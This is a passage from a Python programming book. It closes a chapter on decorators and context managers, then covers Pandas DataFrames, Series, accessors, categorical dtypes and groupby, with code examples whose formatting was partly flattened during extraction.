Stacked or nested decorators are executed from the innermost to the outermost. Can also be used to persist state or cache values.

We also dug into what Context Managers are, how we define them in an optimal manner, along with some of the common and uncommon situations that warrant the use of Context Managers.

In the next chapter, we will be touching upon what the world of data science considers as useful tools, and then we will be looking into some of the best practices that are followed in the industry to optimize, speed up, automate, and refine the processing tools and data applications.

Key takeaways

Code injection into the function, class, or object can be achieved with decorators.

Using decorators, classes could be decorated with additional/external methods and attributes that operate behind the scenes. However, overdoing class decoration can make the code illegible and convoluted. With a decorator based design, the initial size of classes will be less, and they can be upgraded later with the help of decorators.

The maintainability of code is improved with decorators, since now the changes to the common or similar logic happens in one place, and there is lesser risk of missing out on changing some corner code path.

Apart from functions and classes, you can also apply decorators to the generators (using the yield from construct) or coroutines or even to already decorated objects. Decorators can also be stacked.

For creating decorators that accept parameters, the first technique is to create decorators that are a level deeper and have nested functions to introduce a novel model of indirection. Another technique would be to use a class for creating a decorator.

The decorators without parameters can be used without the parenthesis. However, when you pass in the parameters, use them, else avoid.

Singleton classes are not really used as often in Python as in other languages. The effect of a singleton is usually better implemented as a global variable in a module.

Be mindful of the fact that uncensored use of caching in production applications can lead to memory starvation issues.

Keep in mind that decorators, by principle, should not be changing any aspect of the original function that it is wrapping.

Use functools.wraps decorator over the wrapped function, when creating a decorator to avoid overridden names.

It is three times more complex to write reusable code constructs than duplicate code. Hence, the effort to identify where it is needed is worth it. The order in which the decorators are supplied is also important – they are executed from inside out from the innermost decorator to the outmost. Also, only place a single unit of task in a decorator and have multiple ones if needed.

The contextlib class in Python exposes an API in the form a decorator called contextmanager that helps to wrap a function as a context manager. It uses the yield keyword to control the resource. Always think of context managers if the problem deals with resource management, excpetion handling in tests or database access. They make the API simpler, cleaner, and error free.

Further reading

PEP-318, Matt Harrison, Guide to: Learning Python

Dr. Graeme Cross, Meta-matters: Using decorators for better Python

CHAPTER 6 Data Processing Done Right

“Constrained optimization is the art of compromise between conflicting objectives. This is what design is all about.”

— William A. Dembski

Data science as a field has gained massive popularity in the recent years with wide adoption of digital devices and technologies. The field primarily deals with converting massive amounts of data into useful and meaningful marketing strategies. Data today may cover the scores of records generated and available from a person’s shopping patterns and choices to vehicular activity. This data is collected, transformed into a structured state, and then analysed to reach a logical, intelligent conclusion. The process of drawing value-based insights from such unstructured data in the virtual space is commonly what data analytics encompasses.

Python is now widely adopted in the field of Data Science, given its ease-of-use, availability of libraries, and widespread community reach. Having an active community of developers, it is well maintained and frequently updated. Syntactically, it is quite easy to pick up and it is geared to take on emerging areas like Natural Language Processing, Image recognition, machine learning, and data science.

Data Science mostly deals with the extrapolation of useful information from large chunks of data, which are usually unsorted and quite challenging to correlate with meaningful accuracy. Connections in disparate datasets are made with Machine Learning; however, it requires power and computational sophistry. That is where Python comes in – from supporting the CSV outputs for easy reading of data sets, to the more complicated file outputs to be fed into ML clusters for computations.

Structure

In this chapter, we will be touching upon what the world of data science considers as useful tools, and then we will be diving into some of the best practices that are followed day to day by most data scientists to optimize, speed up, automate, and refine their processing tools and applications. Broadly, the following topics will be covered:

Dataframes and Series in Python Idiomatic Pandas Usage & Best Practices

Speeding Up Pandas Projects

Processing CSV Data

Data cleaning with Python and Numpy

Objectives

Python offers a ton of data science libraries, Pandas being the most popular of them, which is an efficient, high performance set of applications that simplify data analysis for most. No matter what scientists want out of Python, from predictive analytics or prescriptive analytics, Python packs a powerful punch with its extensive set of tools and functions. By the end of this chapter, you will be able to do the following: Handle large datasets and complex computations in Pandas.

Improve the performance of Pandas applications.

Perform effective ETL operations in Python with Numpy and Pandas.

Generate and use random data.

Evolution of Python for data science

In the mid-90s, the Python community was working on an extension to take on Matlab for numeric analysis, called Numeric. With several improvements, Numeric later evolved into NumPy. The need of the hour was a plotting utility, which caused the plotting functionality of Matlab to be ported into Python as matplotlib. Next, were the libraries built around scientific computing, building on top of Numpy and Matplotlib to form the SciPy package, which went to be supported by Enthought. Python’s support for array manipulations and plotting functionality like Matlab was a major factor in its adoption over languages like Perl and Ruby.

The Pandas library will remind you of R’s plyr and reshape packages with its support for dataframes and associated functions. Similar to R’s caret package, the Scikit-learn project presents a common interface for several machine-learning algorithms. Similar to Mathematica/Sage, the “notebook” toolset concept has been implemented with IPython notebooks, which has now been improved, power-packed, and manifested in the form of the Jupyter project.

Using Pandas dataframes and series

Pandas is a game changer when it comes to analysing data with Python. It is open source, free to use under the BSD licence, high performant, and is composed of simple data structures and tools for data analysis. The two major distinct data structures that Pandas exposes are:

DataFrames Series

Dataframes in Pandas is a 2-D labelled data structure that looks very similar to the tables in a statistical software (think Excel or R). This is so much easier to work with as compared to working with dictionaries or lists through loops or comprehensions. Dataframes make it easier to extract, change, and analyse valuable information from datasets. We will brush up on some of the Dataframe basics and then discuss the intricacies in usage and performance of Dataframes.

DataFrames creation

Pandas DataFrames can be created by loading the datasets from persistent storage, including but not limited to Excel, CSV, or MySQL database. They can even be constructed from native Python data structures, like Lists and Dictionaries.

What if we get a dataset without any columns? Well, Pandas DataFrame can handle that and create the DataFrame by implicitly adding the Row Index and Column headers for us. For example, let’s create a DataFrame from the following list:

list_of_nums = [[1,2,3,4], [5,6,7,8], [9,10,11,12], [13,14,15,16], [17,18,19,20]] df = pd.DataFrame(list_of_nums)

The result will look like the following:

>>> df 0   1   2   3 0   1   2   3   4 1   5   6   7   8 2   9  10  11  12

3  13  14  15  16 4  17  18  19  20

If we do not want the Pandas DataFrame to automatically generate the Row Indices and Column names, we can pass those as arguments while creating the Dataframe:

df = pd.DataFrame( list_of_nums, index = ["1->", "2->", "3->", "4->", "5->"],

columns = ["A", "B", "C", "D"] )

The following is how it will look like: In [6]: df Out[6]: A   B   C   D 1->   1   2   3   4 2->   5   6   7   8 3->   9  10  11  12 4->  13  14  15  16 5->  17  18  19  20

It should be noted that we could also create a Pandas DataFrame from NumPy arrays as the following:

numpy_array = np.array([[1,2,3,4], [5,6,7,8],

[9,10,11,12], [13,15,16,16], [17,18,19,20]]) df = pd.DataFrame(numpy_array)

Dataframe index with row and column index

If we haven’t provided any Row Index values to the DataFrame, Pandas automatically generates a sequence (0 … 6) as row indices. To provide our own row index, we need to pass the index parameter in the DataFrame(…) function as the following:

df = pd.DataFrame(list_of_nums, index=[1,2,3,4,5]) The index need not be numerical all the time, we can even pass strings as index. For example:

df = pd.DataFrame( list_of_nums, index=["First", "Second", "Third", "Fourth", "Fifth"] )

As you might have guessed, Index are homogeneous in nature, which means we can also use NumPy arrays as Index.

numpy_array = np.array([10,20,30,40,50]) df = pd.DataFrame(list_of_nums, index=numpy_array) Unlike Python lists or dictionaries, and just like NumPy, a column of the DataFrame will always be of the same type. We can check

the data type of a column, either by using dictionary-like syntax or by adding the column name using a DataFrame.

df['marks'].dtype    # Dict Like Syntax df.marks.dtype       # DataFrame.ColumnName df.name.dtype        # DataFrame.ColumnName

If we want to check the data types of all the columns inside the DataFrame, we will use the dtypes attribute of the DataFrame as the following:

df.dtypes It will display the type of all the columns.

Viewing data from the Pandas Dataframe

A Pandas DataFrame will contain a large number of rows of data at any point in time. To selectively view the dataframe rows, we can use head(…) and tail(…) functions, which by default give the first or last five rows (if no input is provided); otherwise, it shows the specific number of rows from the top or bottom as given in the parameter. An extended example of the dataframe from the previous section is as follows: In [15]: df.head() Out[15]: 0   1   2   3 First    1   2   3   4 Second   5   6   7   8 Third    9  10  11  12 Fourth  13  14  15  16 Fifth   17  18  19  20

In [16]: df.tail() Out[16]: 0   1   2   3 Third     9  10  11  12 Fourth   13  14  15  16 Fifth    17  18  19  20 Sixth    21  22  23  24 Seventh  25  26  27  28

In [17]: df.head(2) Out[17]: 0  1  2  3 First   1  2  3  4 Second  5  6  7  8

In [18]: df.tail(3) Out[18]: 0   1   2   3 Fifth    17  18  19  20 Sixth    21  22  23  24 Seventh  25  26  27  28 This was all about data, however, what if we want to see the Row Indices and the Column names? Pandas DataFrame provides specific attributes for viewing them:

df.index     # For Row Indexes df.columns   # For Columns

Helper functions for Dataframe columns

The Pandas DataFrame provides the various column helper functions which is extremely useful for extracting the valuable information from the column. Some examples of these functions are as follows:

unique: Provides unique elements from a column by removing duplicates. For example: df.colors.unique()

mean: Provides the mean value of all the items in the column. For example:

df.weights.mean()

There are several other examples of column functions that can be looked up in the Pandas official documentation.

Using column as row index in DF

Mostly, the datasets already contain a row index. In those cases, we do not need the Pandas DataFrame to generate a separate row index. Not only is it redundant information, it also takes unnecessary amount of memory. The Pandas DataFrames allow setting any existing column or column set as the Row Index. The following is how we can use the columns as index on our sample data: >>> df = pd.DataFrame([['red', 11], ['white', 22], ['blue', 33], ['maroon', 44], ['black', 55]], columns=["colors", "values"])

>>> df colors values 0     red      11 1   white      22 2    blue      33 3  maroon      44 4   black      55 >>> df.set_index('values') colors values 11         red

22       white 33        blue 44      maroon 55       black

>>> df.set_index("colors") values

colors red         11 white       22 blue        33 maroon      44 black       55

We can also set multiple columns as index by passing a list to the set_index(…) method. Let’s add a new column first and see how this works: >>> df['shade'] = pd.Series(['light', 'dark', 'medium', 'dark', 'light']) values shade colors red         11   light white       22    dark blue        33  medium maroon      44    dark black       55   light

>>> df.set_index(["colors","values"]) shade colors values

red    11       light white  22        dark blue   33      medium maroon 44        dark black  55       light

Selective columns load in Pandas Dataframe

Any data analytics activity requires data cleanup and it is quite possible that we conclude to exclude some columns from the datasets that need to be analyzed. This not only saves memory, but also helps to analyze the data that is of interest, not to mention, speeding up the load process. We will use the same data for loading the Pandas DataFrame, but this time we will specify the columns that will be part of the DataFrame: >>> new_df = pd.DataFrame(df, columns=["colors", "shade"])

>>> new_df colors shade 0     red   light 1   white    dark 2    blue  medium 3  maroon    dark 4   black   light

Dropping rows and columns from DataFrames

The Pandas DataFrame provides multiple ways of deleting the rows and columns. There is no functional penalty for choosing one over another. You may use whichever of the following syntax you are comfortable with:

Using dictionary syntax: To remove a column, we’ll use del in the following way: del df['colors']

Using drop function: Allows us to delete the columns as well as the rows. Whether we are going to delete the Rows or Columns is decided by the second argument in the drop function. The second argument 1 in function drop(…) denotes deletion of the Column, whereas 0 means deletion of the Row.

# Delete Column "values" df.drop('values',1)

# Delete the Row with Index "3" df.drop(3,0) We can also delete multiple Rows and Columns by passing the list in the drop(…) function:

# Delete Columns "colors" & "values" df.drop(['colors','values'],1)

# Delete Rows with index "2","3", & "4" df.drop([2,3,4],0)

The Row index are not index numbers, but the row(s) containing that value.

Mathematical operations in DataFrames

Just like Sheets in Excel, the Pandas DataFrames are at ease when performing mathematical operations on complete DataFrames. It is possible to do these operations in a Single Column and this is where the Pandas Series comes into picture.

We will look into the Pandas Series in the upcoming section; let us first see how mathematical operations can be performed on a complete DataFrame: >>> import numpy as np import pandas as pd df = pd.DataFrame(np.random.randint(1,100,size=(5, 5)))

>>> df 0   1   2   3   4 0   3   6  43  19  46 1  31  89  13  20   4 2  88  21  42   8  96 3  12   3  30  19  53 4  86  75  59   2  14 Multiplication: A dataframe can be multiplied with a scalar value, or for that matter with another DataFrame. Let us take a DF with the continuous integers to start with:

>>> df * df 0     1     2    3     4 0     9    36  1849  361  2116 1   961  7921   169  400    16 2  7744   441  1764   64  9216 3   144     9   900  361  2809 4  7396  5625  3481    4   196

>>> df * 10 0    1    2    3    4 0   30   60  430  190  460 1  310  890  130  200   40 2  880  210  420   80  960 3  120   30  300  190  530 4  860  750  590   20  140

Addition/Subtraction: A DataFrame can be added/subtracted with a scalar value or with another DataFrame in line with the multiplication operation that was discussed earlier: >>> df + 100 0    1    2    3    4 0  103  106  143  119  146 1  131  189  113  120  104 2  188  121  142  108  196 3  112  103  130  119  153 4  186  175  159  102  114 BitWise operation: BitWise operations like AND (&), OR (|), and others can be applied to the complete DataFrame.

>>> df & 0 0  1  2  3  4 0  0  0  0  0  0 1  0  0  0  0  0 2  0  0  0  0  0 3  0  0  0  0  0 4  0  0  0  0  0

Creating Pandas series

Technically, the Pandas Series is a single-dimensional labeled array that is capable of storing any data type. Simply put, a Pandas Series is equivalent to a column in an excel sheet. When it comes to the Pandas Data Structure, a Series represents a single column stored in memory, which is either independent or is part of a Pandas Dataframe.

You can create a Pandas Series out of a Python list or NumPy array. However, we need to keep in mind that unlike a normal Python list, which can support data of mixed datatypes, a series will always contain the data of the same data type. Now this is what makes Numpy arrays the preferred choice for creating Pandas Series.

list_series = pd.Series([1,2,3,4,5,6]) np_series = pd.Series(np.array([10,20,30,40,50,60]))

Similar to Dataframes, while generating the Series, Pandas also generates the row index numbers starting from Now, for cleaner operations, we can supply our own index values during the creation of a Series. We simply need to pass the index parameter which accepts a list containing the values of the same data type or even a Numpy array. Let us see an example of a Sequence generated from Numpy:

idx_series = pd.Series( np.array([101,202,303,404,505,606]), index=np.arange(0,12,2) )

The following example shows the use of strings as row index:

idx_series = pd.Series( np.array([101,202,303,404,505,606]),

index=['a', 'b', 'c', 'd', 'e', 'f '] ) You can view the Series row index with the following:

idx_series.index Now, it is important to note that the preceding will always return a Numpy array, irrespective of whether a list was passed while creating the series or a numpy array.

Slicing a series from a DataFrame in Pandas

Although an isolated Series data structure is quite useful when it comes to analysing the data and it comes packed with a plethora of helper functions, in most cases, you will end up using multiple such Series that could in turn be replaced with a Dataframe or a combination of the two.

data_dict = { 'name': ["mark", "robert", "cane", "abel", "lucifer"], 'age': [10, 25, 93, 400, 5000], 'designation': ["Stuntman", "Diector", "President", "PM", "SatanHimself "] }

df = pd.DataFrame(data_dict, index = [ "Tiny -> ", "Small -> ", "Normal -> ", "Huge -> ", "Woah -> "]) The following is how the resultant DataFrame shall look like:

In [58]: df Out[58]:

  name   age   designation Tiny ->        mark    10      Stuntman Small ->     robert    25       Diector Normal ->      cane    93     President Huge ->        abel   400            PM Woah ->     lucifer  5000  SatanHimself

A Dataframe column in Pandas can be accessed by using one of the two supported syntax, one similar to a dictionary – df['column_name'] or Accessing the DF in this way returns a Series object.

Series from DataFrame iterations

A Pandas DataFrame is iterable and allows us to iterate through the individual columns to extract the series.

series_col = [] for col_name in df.columns: series_col.append(df[col_name])

Using series to create DataFrames

A Dataframe in Pandas is internally a combination of one or more Pandas Series. This allows us to combine the multiple Series to generate a DataFrame. For example, let us generate a DataFrame from combining a series of names and series of ages used earlier:

In [73]: idx_series = pd.Series( [10, 25, 93,400, 5000], index =["mark", "robert", "cane", "abel", "lucifer"] ) In [74]: df_from_series = pd.DataFrame([idx_series])

In [75]: df_from_series Out[75]: mark  robert  cane  abel  lucifer 0    10      25    93   400     5000

What you will notice is that the row indexes of Series have now become the column while the columns have been used as the row index value. This phenomenon is similar to taking a Transpose of the matrix. This will hold true even when we provide multiple Series in a comma separated fashion to create a DataFrame.

df_from_series_multiple = pd.DataFrame([series_name1, series_name2])

Ok, now this magic will not happen if you remove the list or array notation while using the Series.

In [76]: df_from_series = pd.DataFrame(idx_series)

In [77]: df_from_series Out[77]: 0

mark       10 robert     25 cane       93 abel      400 lucifer  5000 That does the trick. But this does not apply to the case when multiple Series are to be used in the creation process, since Pandas only supports a single argument in this case.

Using Dicts to create DataFrames

Now, the same phenomenon applies to the use of Python dictionaries in the creation of a Dataframe. Let us look at a sample_dict that we will use to create the dataframe:

>>> sample_dict = {'a': 1, 'b': 2, 'c': 3} >>> df = pd.DataFrame([sample_dict]) >>> df a  b  c 0  1  2  3

Notice that here the keys are represented as Columns which otherwise would have been used as the row index if we had created a Series instead. Pandas also allows combining multiple sample_dict for creating a single DataFrame:

>>> df = pd.DataFrame([sample_dict, sample_dict], index=["Row1", "Row2"]) >>> df a  b  c Row1  1  2  3 Row2  1  2  3

Creating DF from multiple dictsHelper Functions for Pandas Series

Pandas Series comes bundled with an extensive set of helper functions that aid the modern data analyst. It is worth noting that all the Column helper functions that come with the Pandas DataFrame will also work out of the box with the Pandas Series. Some of the examples include the following:

# Getting the mean of a Series series_name.mean() # Getting the size of the Series series_name.size

# Getting all unique items in a series series_name.unique()

# Getting a python list out of a Series series_series.tolist()

You can view the complete list of functions that are supported by the Series data structure at

Series iterations

Similar to most other Python data structures, the Series object also supports iterations using a loop:

for value in series_name: print(value)

We can also iterate over series row indexed by using the following:

for row_index in series_name.keys(): print(row_index)

Pandas tips, tricks and idioms

Pandas provides very streamlined forms of data representation. Simpler data representation facilitates better results for data centric projects. In this section, we will be discussing some useful pointers on how to make the best of the Pandas library.

Configurations, options, and settings at startup

There are several options and system settings that you can configure for Pandas. Setting customized Pandas options when the interpreter starts, gives us a huge advantage in terms of productivity, especially if you primarily work with a scripting environment. You can leverage the pd.set_option() function to configure all the desired options with a Python or iPython startup file. You will have to use the dot notation here, for example pd.set_option('display.max_colwidth', which in turn could be a part of a dictionary of other options:

import pandas as pd

def start(): options = { 'display': { 'max_columns': None, 'max_colwidth': 25,

# Don't wrap to multiple pages 'expand_frame_repr': False, 'max_rows': 14, 'max_seq_items': 50,

# Floating point precision 'precision': 4, 'show_dimensions': False }, 'mode': { # Controls SettingWithCopyWarning 'chained_assignment': None }

}

for category, option in options.items(): for op, value in option.items(): pd.set_option(f '{category}.{op}', value)

if __name__ == '__main__': start() del start  # Clean up interpreter namespace Now, if you launch your Python interpreter session, the startup script will have been executed and Pandas will be automatically imported with all the desired settings and configurations. >>> pd.__name__

'pandas' >>> pd.get_option('display.max_rows') 14

This is specifically useful if your team or organisation primarily uses Pandas as a key data analysis tool. In that case, setting the custom options would ensure that each person working with Pandas would be implicitly following the same conventions. To see how the formatting in the preceding sample startup file plays out, we will be using some data on abalone hosted by the UCI Machine Learning Repository. You will notice that the data will truncate exactly at 14 rows with four digits of precision for floating point numbers: >>> url = ('https://archive.ics.uci.edu/ml/' 'machine-learningdatabases/abalone/abalone.data')

>>> cols = ['sex', 'height', 'weight', 'length', 'diam', 'rings']

>>> abalone = pd.read_csv(url, usecols=[0, 1, 2, 3, 4, 8], names=cols)

>>> abalone sex  height  weight  length    diam  rings 0      M   0.455   0.365   0.095  0.5140     15 1      M   0.350   0.265   0.090  0.2255      7 2      F   0.530   0.420   0.135  0.6770      9 3      M   0.440   0.365   0.125  0.5160     10 4      I   0.330   0.255   0.080  0.2050      7 …   ..     …     …     …     …    …

4172   4173   4174   4175  

F   0.565   0.450   0.165  0.8870     11 M   0.590   0.440   0.135  0.9660     10 M   0.600   0.475   0.205  1.1760      9 F   0.625   0.485   0.150  1.0945     10

4176   M   0.710   0.555   0.195  1.9485     12 [4177 rows x 6 columns]

Using Pandas’ testing module for sample data structures

Included in the Pandas’ native testing module are a number of useful and convenient functions that will help to quickly build quasi-realistic Series and DataFrames:

>>> import pandas.util.testing as tm >>> tm.N, tm.K = 15, 3 >>> import numpy as np >>> np.random.seed(444) >>> tm.makeTimeDataFrame(freq='M').head() A         B         C         D 2000-01-31  0.357440  0.266873  0.353728 -0.536561 2000-02-29  0.377538 -0.480331 -0.433926 -0.886787 2000-03-31  1.382338  0.300781 -0.498028  0.107101 2000-04-30  1.175549 -0.179054  0.228771 -0.740890 2000-05-31 -0.939276  1.183669 -0.650078 -0.075697

>>> tm.makeDataFrame().head() A         B         C         D b8jgVbQbug -0.748504 -0.099509 -0.060078  0.035310 OKCyyhkEvY  0.498427  0.798287 -0.169375 -1.487501 RtcTWq0AMT -0.148212  0.507709 -0.089451 -0.716834 vtdamOujY0 -0.348742  0.273927  1.551892 -0.054453 tW49Zqe3lC  0.161808  0.839752  0.690683  1.536011

Now, that makes the process of testing something much simpler when you do not have to worry about the data to be loaded. It comes built in with about 30 such functions, which you can view by calling the dir() operator on the module object itself.

>>> [i for i in dir(tm) if i.startswith('is')] ['is_bool',

'is_categorical_dtype', 'is_datetime64_dtype', 'is_datetime64tz_dtype', 'is_extension_array_dtype', 'is_interval_dtype', 'is_number', 'is_numeric_dtype', 'is_period_dtype', 'is_sequence', 'is_timedelta64_dtype']

These operations can be ultra helpful if you need to benchmark, or test assertions, or experiment with Pandas operations that you are less familiar with, without having to scour for sample datasets.

Using Accessor methods

Accessors are similar to getter functions in most object-oriented languages. For the purpose of this section, let us assume that accessors in Pandas are properties that serve as an interface to other additional functions.

The Pandas Series comes with the following three such accessors: >>> pd.Series._accessors {'cat', 'dt', 'sparse', 'str'}

Now, let us take a brief look at these accessors, what they can do and how do you leverage them in your daily work.

.cat indicates categorical data, .str indicates string (object) data, and .dt indicates datetime-like data.

Let us start with Assume that we have some location information as a simple Pandas Series represented field. The Pandas string methods are vectorized, which means that they operate on the complete array without the use of explicit for-loop:

>>> address = pd.Series([ 'Seattle, D.C. 12345', 'Brooklyn, NY 12346-1755', 'Palo Alto, CA 58131', 'Redmond, CA 98123'])

>>> address.str.upper() 0        SEATTLE, D.C. 12345 1    BROOKLYN, NY 12346-1755 2        PALO ALTO, CA 58131 3          REDMOND, CA 98123 dtype: object >>> address.str.count(r'\d')  # 5 or 9-digit zip?

0    5 1    9 2    5 3    5 dtype: int64 Ok, now diving deeper, let us assume that we want to separate out the three city/state/ZIP information into fields of a DataFrame. We can pass a regex to the .str.extract() method, where .str is the accessor and the whole thing is an accessor method.

>>> regex = ( r'(?P[A-Za-z]+), '  # One or more letters r'(?P[A-Z]{2}) '    # 2 capital letters r'(?P\d{5}(?:-\d{4})?)') # Optional 4-digit

>>> address.str.replace('.', '').str.extract(regex) city state         zip 0    Seattle    DC       12345 1   Brooklyn    NY  12346-1755 2  Palo Alto    CA       58131 3    Redmond    CA       98123 This example also highlights the concept of method-chaining, where the operation re.str.extract(regex) is called on the return value of address.str.replace('.', which cleans up the use of periods in order to get a cleaner 2-character state abbreviation.

Now, why should you use these accessor methods in the first place, when you could simply do something like Let us look into how these accessor methods actually work that would help answer this query.

Each available accessor in itself is a bona fide class in Python:

.str maps to StringMethods. .dt maps to CombinedDatetimelikeProperties.

.cat routes to CategoricalAccessor. Now, these standalone classes are then attached to the Series class using a It is when the classes are wrapped in

CachedAccessor that we see a bit of magic happen. CachedAccessor is inspired by a cached property design – a property is only computed once per instance and then replaced by an ordinary attribute. To achieve this, it overloads the .__get__() method, which is part of Python’s descriptor protocol.

Python 3 has also introduced functools.lru_cache(), which offers a similar functionality. There are examples all over the place for this pattern, such as in the aiohttp package.

The next accessor, is for datetime-like data. It technically belongs to Pandas’ and if called on a Series, it is converted to a DatetimeIndex first: >>> datering = pd.Series(pd.date_range('2015', periods=9, freq='Q')) >>> datering 0   1   2   3  

2015-03-31 2015-06-30 2015-09-30 2015-12-31

4   5   6   7  

2016-03-31 2016-06-30 2016-09-30 2016-12-31

8   2017-03-31 dtype: datetime64[ns]

>>> datering.dt.day_name() 0      Tuesday 1      Tuesday 2    Wednesday 3     Thursday 4     Thursday 5     Thursday 6       Friday 7     Saturday 8       Friday dtype: object >>> datering[datering.dt.quarter > 2] 2   3   6   7  

2015-09-30 2015-12-31 2016-09-30 2016-12-31

dtype: datetime64[ns] >>> datering[datering.dt.is_year_end] 3   2015-12-31 7   2016-12-31 dtype: datetime64[ns]

The third accessor, is for use with Categorical data only.

DatetimeIndex from component columns

When it comes to datetime-like data, similar to the datering mentioned earlier, we can also create a Pandas DatetimeIndex from multiple component columns which can together form a date or datetime:

>>> from itertools import product >>> datecols = ['year', 'month', 'day'] >>> df = pd.DataFrame(list(product( [2019, 2020], [1, 2], [1, 2, 3])), columns=datecols) >>> df['data'] = np.random.randn(len(df )) >>> df year  month  day      data 0   2019      1    1 -0.261110 1   2019      1    2  0.028835 2   2019      1    3  0.122392 3   2019      2    1 -0.438345 4   2019      2    2  0.612122 5   2019      2    3 -2.506080 6   2020      1    1 -1.040233 7   2020      1    2 -0.967498 8   2020      1    3  0.595033 9   2020      2    1  0.873375 10  2020      2    2 -0.892723 11  2020      2    3  2.196084

>>> df.index = pd.to_datetime(df[datecols]) >>> df.head() year  month  day      data 2019-01-01  2019      1    1 -0.261110

2019-01-02  2019      1    2  0.028835 2019-01-03  2019      1    3  0.122392 2019-02-01  2019      2    1 -0.438345 2019-02-02  2019      2    2  0.612122

Finally, we can now drop the old individual columns and convert this into a Series:

>>> df = df.drop(datecols, axis=1).squeeze() >>> df.head() 2019-01-01   -0.261110 2019-01-02    0.028835 2019-01-03    0.122392 2019-02-01   -0.438345 2019-02-02    0.612122 Name: data, dtype: float64

>>> df.index.dtype.name >>> 'datetime64[ns]' So, why do we pass a DataFrame here? In Python, imagine that a Dataframe resembles a dictionary in which the column names are the keys and the individual columns represented by the Series are the Dictionary values. This is the reason why pd.to_datetime(df[datecols].to_dict(orient='list')) would also be a valid operation here. This mirrors the construction of Python’s

where we can pass keyword arguments, for example, datetime.datetime(year=2000, month=1, day=15,

Using categorical data for time and space optimization

A powerful feature bundled with Pandas is its Categorical Even if we are not always working with huge datasets that use gigabytes of RAM, we have probably run into cases where straightforward operations on large DataFrames seem to lag for seconds.

It can be argued that Pandas object dtype is often a great candidate for conversion to category data. (Object is a container for Python heterogeneous data types, or other types that are not directly decipherable.) Strings in Python occupy a significant amount of memory space:

>>> import pandas as pd >>> colors = pd.Series([ 'periwinkle', 'mint green', 'burnt orange', 'periwinkle', 'burnt orange'])

>>> import sys >>> colors.apply(sys.getsizeof )) 0    59 1    59 2    61

3    59 4    61 dtype: int64

We have used sys.getsizeof() to demonstrate the memory consumed by the individual values in the Series. Also note that these are Python objects that have some overhead to begin with (sys.getsizeof(‘’) will return 49 bytes).

We also have which will summarize the memory consumption and relies on the .nbytes attribute of the underlying NumPy array. Now, what if we could take the unique colors in the example and map each of them to a less space-consuming integer? Let’s take a naïve example:

>>> mapper = {v: k for k, v in enumerate(colors.unique())} >>> mapper {'periwinkle': 0, 'mint green': 1, 'burnt orange': 2} >>> as_int = colors.map(mapper) >>> as_int 0    0 1    1 2    2 3    0

4    2 dtype: int64 >>> as_int.apply(sys.getsizeof ) 0    24 1    28 2    28 3    24 4    28 dtype: int64

As we can see, this reduces the memory consumption to half, as compared to when the raw strings were used to store the object dtype. In the previous section on accessors, we learnt about the categorical accessor. This preceding code fragment gives a brief idea of how the categorical dtype internally works in Pandas.

It is worth noting that the memory consumption of a Categorical dtype is proportional to the number of categories added to the length of the data. On the contrary, an object dtype is a constant multiplied by the length of the data.

An added advantage is that the computational efficiency also gets a boost here – for the categorical Series, the string operations are performed on the attribute instead of on each original element of the Series. To put it otherwise, the operation is done once for each unique category, and the results are mapped back to the original values. The categorical data has a .cat accessor that is a window into attributes and methods for manipulating the categories:

>>> cat_colors = colors.astype('category') >>> cat_colors.cat.categories Index(['burnt orange', 'mint green', 'periwinkle'], dtype='object') >>> cat_colors.cat.codes 0    2 1    1 2    0 3    2 4    0 dtype: int8

If we look at the dtype, it is NumPy’s int8, which is an 8-bit signed integer that can take on values from -127 to 128. (Only a single byte is needed to represent a value in memory. 64-bit signed ints would be an overkill in terms of memory usage.) Our rough-hewn example resulted in int64 data by default, whereas Pandas is smart enough to downcast the categorical data to the smallest estimated numerical dtype possible.

However, there are a few catches here. We cannot always use the categorical data. The categorical data is generally less flexible. For example, if we are inserting the previously unseen values, we need to add this value to a .categories container first. If we plan to set values or reshape the data rather than deriving new computations, Categorical types may be rather less nimble and not a great choice.

Groupby objects through iteration

Groupby is a fundamental operation. When df.groupby('x') is called, the resulting groupby objects in Pandas can be a bit opaque. This object then undergoes a lazy instantiation and does not have any meaningful representation by itself. All right, now we have a groupby object, but what is this thing, and how do we see it?

Before we call constructs like we can take advantage of the fact that groupby objects are iterable in nature. Each “entity” yielded by is basically a tuple (of name, subsetted object), where the name is the value of the column on which we’re grouping, and subsetted object is nothing but a DataFrame, which is a subset of the original DataFrame based on which grouping condition we provide. That is, chunking of the data is done as per the group.

So, regardless of what calculation we perform on the grouped, be it a single Pandas function or custom-built functions, each of these “sub-frames” is passed one at a time in the form of an argument to that callable. This is where the term originates – break up the data as per the groups, perform a group-wise calculation, and then recombine them in an aggregated manner.

Membership binning mapping trick

Let us assume that we have a Series and a corresponding mapping table in which each value is part of some multi-member group, or not part of any group at all.

>>> countries = pd.Series([ 'United States', 'Canada', 'Mexico', 'Belgium', 'United Kingdom', 'Thailand'])

>>> groups = { 'North America': ('United States', 'Canada', 'Mexico', 'Greenland'), 'Europe': ('France', 'Germany', 'United Kingdom', 'Belgium') }

Now, we need to map countries to the following result:

>>> countries 0     United States 1            Canada 2            Mexico 3           Belgium 4    United Kingdom

5          Thailand dtype: object

Let us analyse the use case here. We want a similar operation as the pd.cut() in Pandas, but in this case, we need to bin, based on the categorical representations. We could use pd.Series.map() that we have come across earlier. In order to achieve that, we will use the following code fragment:

from typing import Any def membership_map(s: pd.Series, groups: dict, fillvalue: Any=-1) -> pd.Series: # Reverse & expand the dictionary key-value pairs groups = {x: k for k, v in groups.items() for x in v} return s.map(groups).fillna(fillvalue)

Now, we expect this to definitely run significantly faster than if we had used a Python loop in a nested fashion for the groups for each country in countries. Let us take a test drive: >>> membership_map(countries, groups, fillvalue='other') 0    North America 1    North America 2    North America 3           Europe 4           Europe 5            other dtype: object

We now break down what’s actually going on here.

This would be a great place to step into a function’s scope with Python’s debugger, pdb, to inspect which variables are local to the function.

The objective here would be to map every group to an integer. However, Series.map() will not recognize needs to be broken down with each character from each group that is mapped to an integer. The following is what the dictionary comprehension here is doing: >>> groups = dict(enumerate(('ab', 'cd', 'xyz')))

>>> {x: k for k, v in groups.items() for x in v} {'a': 0, 'b': 0, 'c': 1, 'd': 1, 'x': 2, 'y': 2, 'z': 2}

Now, this dictionary can be passed to s.map() to map its values to their corresponding group indices.

Boolean operator usage in Pandas

